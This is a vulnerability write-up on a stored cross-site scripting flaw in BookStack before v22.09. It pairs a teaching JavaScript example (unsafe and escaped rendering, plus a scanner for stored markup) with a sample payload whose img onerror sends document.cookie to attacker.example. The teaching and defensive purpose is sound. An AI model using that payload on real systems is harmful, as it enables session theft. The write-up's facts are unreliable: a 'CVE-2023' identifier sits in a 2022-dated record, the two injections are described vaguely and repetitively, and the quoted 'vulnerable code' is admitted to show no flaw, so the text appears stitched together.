CVE-2022-40690 An attacker can inject arbitrary scripts in BookStack versions prior to v22.09.

The injection occurs when a user requests an item from a different BookStack installation than the current one. It is a stored cross-site scripting (XSS) issue: content submitted to the installation is saved and later rendered for whoever views the item, and because it is not adequately sanitised, script embedded in that content runs in the viewer's browser with the viewer's session. Exploiting it requires either an account on the target installation that can submit the affected content (a malicious administrator, for example) or a way to make an already authenticated user submit the payload on the attacker's behalf, such as a cross-site request forgery attack. Cross-site scripting arises when an application places user-supplied data into a page without encoding it for the context in which it appears, so that data intended as text is interpreted by the browser as markup or script. Stored XSS, the variant at issue here, is generally more serious than reflected XSS because the payload is persisted server-side and delivered to every subsequent viewer rather than requiring each victim to open a crafted link.
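The rendering mistake behind a stored XSS and its fix, as an added example in JavaScript that is not BookStack's own code: renderUnsafe concatenates stored fields straight into markup, renderSafe escapes them for the HTML context, and findScriptBearingMarkup is a small triage scanner for content that is already in the database (it parses quoted attribute values, so an escaped payload sitting inside a title="..." value is not flagged). The item shape, field names, function names and payloads are constructed for this illustration and are not taken from BookStack.

```javascript
// Added example, not BookStack's own code. Demonstrates the vulnerable and
// fixed rendering patterns for stored user content, plus a scanner for
// triaging content that is already stored. Item shape, field names and
// payloads below are constructed for illustration.

const ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape a value for use as HTML text or inside a double-quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ESCAPES[c]);
}

// Vulnerable pattern: stored fields are interpolated straight into markup,
// so tags and attributes inside the stored value become part of the page.
function renderUnsafe(item) {
  return `<div class="item" title="${item.name}"><p>${item.description}</p></div>`;
}

// Fixed pattern: every interpolated value is escaped for its context.
function renderSafe(item) {
  return `<div class="item" title="${escapeHtml(item.name)}"><p>${escapeHtml(item.description)}</p></div>`;
}

// Attributes whose value is navigated or fetched, so a javascript: URL executes.
const URL_ATTRS = new Set(['href', 'src', 'action', 'formaction', 'xlink:href', 'data']);

// Matches one opening tag and captures its raw attribute string.
const TAG_RE = /<([a-zA-Z][\w:-]*)((?:\s+[^\s"'>\/=]+(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s"'>]+))?)*)\s*\/?>/g;
// Matches one attribute (name, then an optional quoted or bare value).
const ATTR_RE = /([^\s"'>\/=]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;

// Walk the tags in a fragment and report script-bearing constructs.
// Quoted attribute values are honoured, so "onerror=" that appears only as
// text inside another attribute's value is not reported. Triage tooling, not a sanitiser.
function findScriptBearingMarkup(html) {
  const findings = [];
  for (const tag of html.matchAll(TAG_RE)) {
    const name = tag[1].toLowerCase();
    if (name === 'script') findings.push({ tag: name, attr: null, reason: 'script element' });
    for (const a of tag[2].matchAll(ATTR_RE)) {
      const attr = a[1].toLowerCase();
      // Strip whitespace and control characters browsers ignore before a URL scheme.
      const value = (a[2] ?? a[3] ?? a[4] ?? '').replace(/[\x00-\x20]/g, '').toLowerCase();
      if (attr.startsWith('on')) {
        findings.push({ tag: name, attr, reason: 'event handler attribute' });
      } else if (URL_ATTRS.has(attr) && value.startsWith('javascript:')) {
        findings.push({ tag: name, attr, reason: 'javascript: URL' });
      } else if (attr === 'srcdoc') {
        findings.push({ tag: name, attr, reason: 'inline document' });
      }
    }
  }
  return findings;
}

// Constructed sample: an item whose stored fields carry typical payloads
// (attribute breakout in the name, tag injection and a javascript: link in the description).
const SAMPLE_ITEM = {
  name: 'Guide" onmouseover="alert(document.cookie)',
  description: 'Intro <img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)"> ' +
    '<a href="javascript:alert(1)">link</a>',
};

// Scan both renderings of an item; the unsafe one yields findings, the safe one none.
function demo(item = SAMPLE_ITEM) {
  return {
    unsafe: findScriptBearingMarkup(renderUnsafe(item)),
    safe: findScriptBearingMarkup(renderSafe(item)),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

In a Laravel/Blade application such as BookStack the equivalent of renderSafe is emitting user content through the escaping `{{ }}` syntax rather than the raw `{!! !!}` syntax; that is the general pattern, not a description of the specific change shipped in v22.09. The scanner is useful after upgrading, to check whether a payload was stored before the fix was in place; it does not replace output encoding or a real HTML sanitiser.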

Injection - CVE-2022-40690


Vulnerable code (fragment):

    if (parent_id == 0) {
        // Returns the raw markup inside <head> as a string.
        return document.getElementsByTagName('head')[0].innerHTML;
    }

On its own this fragment only reads the existing markup of the document head; it does not by itself show where untrusted input reaches the page.


CVE-2023-40691

The second injection occurs when an attacker uses the same credentials to access the application from another BookStack installation. As with the first issue, the attacker must already have access to the target installation, either through an account there (for example a malicious administrator) or by making an authenticated user submit the request on the attacker's behalf through a cross-site request forgery attack.
There are therefore two injections in the current implementation: one occurs when someone requests an item from a different BookStack installation than their current one, and the other occurs when someone uses the same credentials to access the application from another BookStack installation. Neither is reachable by an unauthenticated visitor.


Timeline

Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/24/2022 16:14:00 UTC
